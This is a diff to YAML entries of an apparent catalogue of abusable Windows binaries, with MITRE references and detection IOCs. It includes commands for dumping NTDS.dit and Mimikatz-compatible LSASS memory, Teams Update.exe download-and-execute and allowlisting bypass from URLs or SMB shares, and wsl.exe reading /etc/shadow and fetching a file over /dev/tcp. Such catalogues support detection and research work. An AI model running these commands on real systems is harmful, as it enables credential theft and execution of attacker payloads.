+  - Command: ntdsutil.exe "ac i ntds" "ifm" "create full c:\" q q
+    Description: Dump NTDS.dit into folder
+    Usecase: Dumping of Active Directory NTDS.dit database
+    Category: Dump
+    Privileges: Administrator
+    MitreID: T1003
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1003
+    OperatingSystem: Windows
+Full_Path:
+  - Path: C:\Windows\System32\ntdsutil.exe
+Code_Sample:
+  - Code:
+Detection:
+  - IOC: ntdsutil.exe with command line including "ifm"
+Resources:
+  - Link: https://adsecurity.org/?p=2398#CreateIFM
+Acknowledgement:
+  - Person: Sean Metcalf
+    Handle: '@PyroTek3'
+---
--- a/yml/OtherMSBinaries/Sqldumper.yml
+++ b/yml/OtherMSBinaries/Sqldumper.yml
@ -6,15 +6,15 @@ Created: '2018-05-25'
 Commands:
  - Command: sqldumper.exe 464 0 0x0110
    Description: Dump process by PID and create a dump file (Appears to create a dump file called SQLDmprXXXX.mdmp).
-    Usecase: Dump process uisng PID.
+    Usecase: Dump process using PID.
    Category: Dump
    Privileges: Administrator
    MitreID: T1003
    MitreLink: https://attack.mitre.org/wiki/Technique/T1003
    OperatingSystem: Windows
  - Command: sqldumper.exe 540 0 0x01100:40
-    Description: 0x01100:40 flag will create a Mimikatz compatibile dump file.
-    Usecase: Dump LSASS.exe to Mimikatz compatable dump uisng PID.
+    Description: 0x01100:40 flag will create a Mimikatz compatible dump file.
+    Usecase: Dump LSASS.exe to Mimikatz compatible dump using PID.
    Category: Dump
    Privileges: Administrator
    MitreID: T1003
--- a/yml/OtherMSBinaries/Squirrel.yml
+++ b/yml/OtherMSBinaries/Squirrel.yml
--- a/yml/OtherMSBinaries/Update.yml
+++ b/yml/OtherMSBinaries/Update.yml
@ -1,9 +1,65 @@
 ---
 Name: Update.exe
-Description: Update is the squirrel update utility used by Microsoft Electron app (Teams in this case)
-Author: 'Mr.Un1k0d3r'
+Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.
+Author: 'Oddvar Moe'
 Created: '2019-06-26'
 Commands:
+  - Command: Update.exe --download [url to package]
+    Description: The above binary will go to url and look for RELEASES file and download the nuget package.
+    Usecase: Download binary
+    Category: Download
+    Privileges: User
+    MitreID: T1218 
+    MitreLink: https://attack.mitre.org/techniques/T1218/
+    OperatingSystem: Windows 7 and up with Microsoft Teams installed
+  - Command: Update.exe --update=[url to package]
+    Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
+    Usecase: Download and execute binary
+    Category: AWL Bypass
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/techniques/T1218/
+    OperatingSystem: Windows 7 and up with Microsoft Teams installed
+  - Command: Update.exe --update=[url to package]
+    Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
+    Usecase: Download and execute binary
+    Category: Execute
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/techniques/T1218/
+    OperatingSystem: Windows 7 and up with Microsoft Teams installed
+  - Command: Update.exe --update=\\remoteserver\payloadFolder
+    Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
+    Usecase: Download and execute binary
+    Category: AWL Bypass
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/techniques/T1218/
+    OperatingSystem: Windows 7 and up with Microsoft Teams installed
+  - Command: Update.exe --update=\\remoteserver\payloadFolder
+    Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
+    Usecase: Download and execute binary
+    Category: Execute
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/techniques/T1218/
+    OperatingSystem: Windows 7 and up with Microsoft Teams installed
+  - Command: Update.exe --updateRollback=[url to package]
+    Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
+    Usecase: Download and execute binary
+    Category: AWL Bypass
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/techniques/T1218/
+    OperatingSystem: Windows 7 and up with Microsoft Teams installed
+  - Command: Update.exe --updateRollback=[url to package]
+    Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
+    Usecase: Download and execute binary
+    Category: Execute
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/techniques/T1218/
+    OperatingSystem: Windows 7 and up with Microsoft Teams installed
  - Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
    Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
    Usecase: Application Whitelisting Bypass
@ -12,6 +68,22 @@ Commands:
    MitreID: T1218
    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
    OperatingSystem: Windows 7 and up with Microsoft Teams installed
+  - Command: Update.exe --updateRollback=\\remoteserver\payloadFolder
+    Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
+    Usecase: Download and execute binary
+    Category: AWL Bypass
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/techniques/T1218/
+    OperatingSystem: Windows 7 and up with Microsoft Teams installed
+  - Command: Update.exe --updateRollback=\\remoteserver\payloadFolder
+    Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
+    Usecase: Download and execute binary
+    Category: Execute
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/techniques/T1218/
+    OperatingSystem: Windows 7 and up with Microsoft Teams installed
  - Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
    Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
    Usecase: Execute binary
@ -21,12 +93,25 @@ Commands:
    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
    OperatingSystem: Windows 7 and up with Microsoft Teams installed
 Full_Path:
-  - Path: '%userprofile%\AppData\Local\Microsoft\Teams\Update.exe'
+  - Path: '%localappdata%\Microsoft\Teams\update.exe'
+Code_Sample: 
+  - Code: https://github.com/jreegun/POC-s/tree/master/nuget-squirrel
 Detection: 
  - IOC: Update.exe spawned an unknown process
 Resources:
+  - Link: https://www.youtube.com/watch?v=rOP3hnkj7ls
+  - Link: https://twitter.com/reegun21/status/1144182772623269889
  - Link: https://twitter.com/MrUn1k0d3r/status/1143928885211537408
+  - Link: https://twitter.com/reegun21/status/1291005287034281990
+  - Link: http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/
+  - Link: https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12
+  - Link: https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56
+  - Link: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/
 Acknowledgement:
+  - Person: Reegun Richard Jayapaul (SpiderLabs, Trustwave)
+    Handle: '@reegun21'
  - Person: Mr.Un1k0d3r
    Handle: '@MrUn1k0d3r'
+  - Person: Adam
+    Handle: '@Hexacorn'
 ---
--- a/yml/OtherMSBinaries/Wsl.yml
+++ b/yml/OtherMSBinaries/Wsl.yml
@ -20,6 +20,22 @@ Commands:
    MitreID: T1202
    MitreLink: https://attack.mitre.org/techniques/T1202
    OperatingSystem: Windows 10, Windows 19 Server
+  - Command: wsl.exe --exec bash -c 'cat file'
+    Description: Cats /etc/shadow file as root
+    Usecase: Performs execution of arbitrary Linux commands.
+    Category: Execute
+    Privileges: User
+    MitreID: T1202
+    MitreLink: https://attack.mitre.org/techniques/T1202
+    OperatingSystem: Windows 10, Windows 19 Server
+  - Command: wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
+    Description: Downloads file from 192.168.1.10
+    Usecase: Download file
+    Category: Download
+    Privileges: User
+    MitreID: T1202
+    MitreLink: https://attack.mitre.org/techniques/T1202
+    OperatingSystem: Windows 10, Windows 19 Server
 Full_Path:
  - Path: C:\Windows\System32\wsl.exe
 Code_Sample:
@ -33,4 +49,6 @@ Acknowledgement:
    Handle: '@aionescu'
  - Person: Matt
    Handle: '@NotoriousRebel1'
+  - Person: Asif Matadar
+    Handle: '@d1r4c'
 ---
--- a/yml/OtherMSBinaries/update.yml
+++ b/yml/OtherMSBinaries/update.yml
@ -1,83 +0,0 @@
---
-Name: Update.exe
-Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.
-Author: 'Oddvar Moe'
-Created: '2019-06-26'
-Commands:
-  - Command: Update.exe --download [url to package]
-    Description: The above binary will go to url and look for RELEASES file and download the nuget package.
-    Usecase: Download binary
-    Category: Download
-    Privileges: User
-    MitreID: T1218 
-    MitreLink: https://attack.mitre.org/techniques/T1218/
-    OperatingSystem: Windows 7 and up with Microsoft Teams installed
-  - Command: Update.exe --update [url to package]
-    Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
-    Usecase: Download and execute binary
-    Category: AWL Bypass
-    Privileges: User
-    MitreID: T1218
-    MitreLink: https://attack.mitre.org/techniques/T1218/
-    OperatingSystem: Windows 7 and up with Microsoft Teams installed
-  - Command: Update.exe --update [url to package]
-    Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
-    Usecase: Download and execute binary
-    Category: Execute
-    Privileges: User
-    MitreID: T1218
-    MitreLink: https://attack.mitre.org/techniques/T1218/
-    OperatingSystem: Windows 7 and up with Microsoft Teams installed
-  - Command: Update.exe --updateRoolback=[url to package]
-    Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
-    Usecase: Download and execute binary
-    Category: AWL Bypass
-    Privileges: User
-    MitreID: T1218
-    MitreLink: https://attack.mitre.org/techniques/T1218/
-    OperatingSystem: Windows 7 and up with Microsoft Teams installed
-  - Command: Update.exe --updateRollback=[url to package]
-    Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
-    Usecase: Download and execute binary
-    Category: Execute
-    Privileges: User
-    MitreID: T1218
-    MitreLink: https://attack.mitre.org/techniques/T1218/
-    OperatingSystem: Windows 7 and up with Microsoft Teams installed
-  - Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
-    Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
-    Usecase: Application Whitelisting Bypass
-    Category: AWL Bypass
-    Privileges: User
-    MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
-    OperatingSystem: Windows 7 and up with Microsoft Teams installed
-  - Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
-    Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
-    Usecase: Execute binary
-    Category: Execute
-    Privileges: User
-    MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
-    OperatingSystem: Windows 7 and up with Microsoft Teams installed
-Full_Path:
-  - Path: '%localappdata%\Microsoft\Teams\update.exe'
-Code_Sample: 
-  - Code: https://github.com/jreegun/POC-s/tree/master/nuget-squirrel
-Detection: 
-  - IOC: Update.exe spawned an unknown process
-Resources:
-  - Link: https://www.youtube.com/watch?v=rOP3hnkj7ls
-  - Link: https://twitter.com/reegun21/status/1144182772623269889
-  - Link: https://twitter.com/MrUn1k0d3r/status/1143928885211537408
-  - Link: http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/
-  - Link: https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12
-  - Link: https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56
-Acknowledgement:
-  - Person: Reegun J (OCBC Bank)
-    Handle: '@reegun21'
-  - Person: Mr.Un1k0d3r
-    Handle: '@MrUn1k0d3r'
-  - Person: Adam
-    Handle: '@Hexacorn'
---